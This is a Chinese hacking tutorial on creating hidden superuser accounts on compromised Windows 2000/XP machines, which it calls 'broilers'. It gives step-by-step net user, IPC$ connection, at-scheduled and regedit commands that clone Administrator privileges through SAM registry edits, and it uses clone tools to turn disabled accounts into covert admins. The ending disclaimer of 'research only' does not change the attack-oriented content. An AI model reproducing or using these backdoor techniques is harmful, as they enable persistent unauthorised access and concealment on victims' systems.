、如何在图形界面建立隐藏超级用户
图形界面下适用本地或开3389终端服务肉鸡上上面我提到那位作者说思路方法很好但是较为复杂还要用到psu.exe(让以系统用户身份运行)如果在肉鸡上话还要上传psu.exe我说这个思路方法将不用到psu.exe这个windows2000有两个注册表编辑器:regedit.exe和regedt32.exeXP中regedit.exe和regedt32.exe实为个修改键值权限时在右键中点“权限”来修改对regedit.exe我想大家都很熟悉但却不能对注册表项键设置权限而regedt32.exe最大优点就是能够对注册表项键设置权限nt/2000/xp帐户信息都在注册表HKEY_LOCAL_MACHINE\SAM\SAM键下但是除了系统用户SYSTEM外其它用户都无权查看到里面信息因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限这样就可以对SAM键内信息进行读写了了具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务肉鸡上首先在命令行下或帐户管理器中建立个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe
3、点“权限”以后会弹出窗口
点添加将我登录时帐户添加到安全栏内这里我是以administrator身份登录所以我就将administrator加入并设置权限为“完全控制"这里需要介绍说明下:最好是添加你登录帐户或帐户所在组切莫修改原有帐户或组否则将会带来系列不必要问题等隐藏超级用户建好以再来这里将你添加帐户删除即可
4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe
打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Dos\account\user\names\hacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg用记事本分别打这几个导出文件进行编辑将超级用户对应项000001F4下键"F"值复制并覆盖hacker$对应项00000409下键"F"值,然后再将00000409.reg和hacker.reg合并
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe窗口内按F5刷新然后打文件-导入注册表文件将修改好hacker.reg导入注册表即可
8、到此隐藏超级用户hacker$已经建好了然后关闭regedit.exe在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来样子(只要删除添加帐户administrator即可)
9、注意:隐藏超级用户建好后在帐户管理器看不到hacker$这个用户在命令行用“net user”命令也看不到但是超级用户建立以后就不能再改密码了如果用net user命令来改hacker$密码话那么在帐户管理器中将又会看这个隐藏超级用户了而且不能删除
如何在命令行下远程建立隐藏超级用户
在这里将用at命令用at产生计划任务是以系统身份运行所以也用不到psu.exe为了能够使用at命令肉鸡必须开有schedule服务如果没有开启可用流光里带工具netsvc.exe或sc.exe来远程启动当然其思路方法也可以只要能启动schedule服务就行
对于命令行方式你可以采用各种连接方式如用SQLexec连接MSSQL1433端口也可以用telnet服务只要以你能得到个cmdshell并且有运行at命令权限就可以
1、首先找到台肉鸡至于如何来找那不是我这里所说话题这里先假设找到台超级用户为administrator,密码为12345678肉鸡现在我们开始在命令行下远程为它建立隐藏超级用户(例子中主机是我局域网内台主机我将它ip地址改为13.50.97.238,请勿在互联网上对号入座,以免骚扰正常ip地址)
2、先和肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立个用户(如果at服务没有启动可用小榕netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51
c:\winnt\system32\net.exe user hacker$ 1234 /add
建立这个加有$符用户名是加有$符后命令行下用net user将不显示这个用户但在帐户管理器却能看到这个用户
4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Dos\account\users下键值:at \\13.50.97.238 12:55
c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Dos\account\users\
/e 是regedit.exe参数在_LOCAL_MACHINE\SAM\SAM\Dos\account\users\这个键定要以\结尾必要情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Dos\account\users\"引起来
5、将肉鸡上hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
修改思路方法图形界中已经介绍过了这里就不作介绍了
6、再将编辑好hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7、查看肉鸡时间:net time \\13.50.97.238 然后用at命令将用户hacker$删除:
at \\13.50.97.238 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use \\13.50.97.238 /del 断开和肉鸡连接
net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$和肉鸡连接不能连接介绍说明已删除
9、再和肉鸡建立连接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"
再取得肉鸡时间用at命令将拷回肉鸡hacker1.reg导入肉鸡注册表:
at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
regedit.exe参数/s是指安静模式
10、再验证hacker$是否已建立思路方法同上面验证hacker$是否被删除样
11、再验证用户hacker$是否有读、写、删权限如果不放心你还可验证是否能建立其它帐户
12、通过11可以断定用户hacker$具有超级用户权限最初我用at命令建立它时候是个普通用户而现在却具有远程读、写、删权限
3、如果肉鸡没有开3389终端服务而我又不想用命令行如何办?
这种情况下你也可以用界面方式来远程为肉鸡建立隐藏超级用户regedit.exe、regedt32.exe都有连接网络注册表功能你可以用regedt32.exe来为远程主机注册表项设置权限用regedit.exe来编辑远程注册表帐户管理器也有项连另台计算机功能你可以用帐户管理器为远程主机建立和删除帐户具体步聚和上面介绍相似我就不多说了只它速度实在是令人难以忍受
但是这里有两个前提:
1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来和远程主机建立连接以后才能用regedit.exe regedt32.exe及帐户管理器和远程主机连接
2、远程主机必须开启远程注册表服务(没有开启话你也可以远程开启你有超级用户密码了)
4、利用被禁用帐户建立隐藏超级用户:
我们可以用肉鸡上被禁止用户来建立隐藏超组用户.思路方法如下:
1.想办法查看有哪些用户被细心管理员禁止般情况下有些管理员出于安全考虑通常会将guest禁用当然了会禁用其它用户在图形界面下非常容易只要在帐户管理器中就可以看到被禁用帐户上有个红叉;而在命令行下我还没有想到好办法只能在命令行下用命令:"net user 用户名"个个来查看用户是否被禁用
2.在这里我们假设用户hacker被管理员禁用首先我先用小榕超组用户克隆CA.exe将被禁用用户hacker 克隆成超级用户(克隆的后被禁用用户hacker就会自动被激活了): CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码
3.如果你现在个cmdshell如利用telnet服务或SQLEXEC连接肉鸡msSQL默认端口1433得到shell都可以这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样)当然你也可以将用户hacher换成其它被禁用用户
4.这时如果你在图形界面下看帐户管理器中用户时,会发现用户hacker被禁用了但事实上是这样吗?你用这个被禁用用户连接下肉鸡看看是否能连上?用命令:net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连连看看我可以告诉大家经过我多次试验次次都能成功而且还是超级用户权限
5.如果没有cmdshell如何办?你可以我上面介绍at命令来禁用用户hacker;命令格式:at \\肉鸡ip 时间 net user hacker /active:no
6.原理:具体高深原理我也说不上来我只能从最简单说你先在图形界面下在帐户管理器中禁用下超级用户administrator看看肯定会弹出对话框并禁止你继续禁用超级用户administrator同样在克隆时hacker在注册表"F"键被超级用户administrator在注册表"F"键所替代因而hacker就具有了超级用户权限了但是由于hacker在注册表内"C"健还是原来"C"键所以hacker还是会被禁用但是它超级用户权限却不会被禁用因此被禁用用户hacker还是可以连接肉鸡而且还具有超级用户权限具体我也说不明白大家权且这么理解吧
5、注意几点事项:
1、隐藏超级用户建立以后在帐户管理器中和命令行下均看不到这个用户但这个用户却存在
2、隐藏超级用户建立以后就不能再修改密码了旦修改密码这个隐藏超级用户就会暴露在帐户管理器中而且不能删除
3、如在本机上试验时最好用系统自带备份工具先备份好本机“系统状态”主要是注册表备份本人做试验时曾出现过帐户管理器中看不到任何用户组中也看不到任何组现象但它们却存在幸好我有备份,呵呵SAM键是毕竟系统最敏感部位
4、本思路方法在2000/XP上测试通过未在NT上测试本思路方法仅供研究请勿将本思路方法用于破坏上利用本思路方法造成严重后果者由使用者负责本人概不负责
最新评论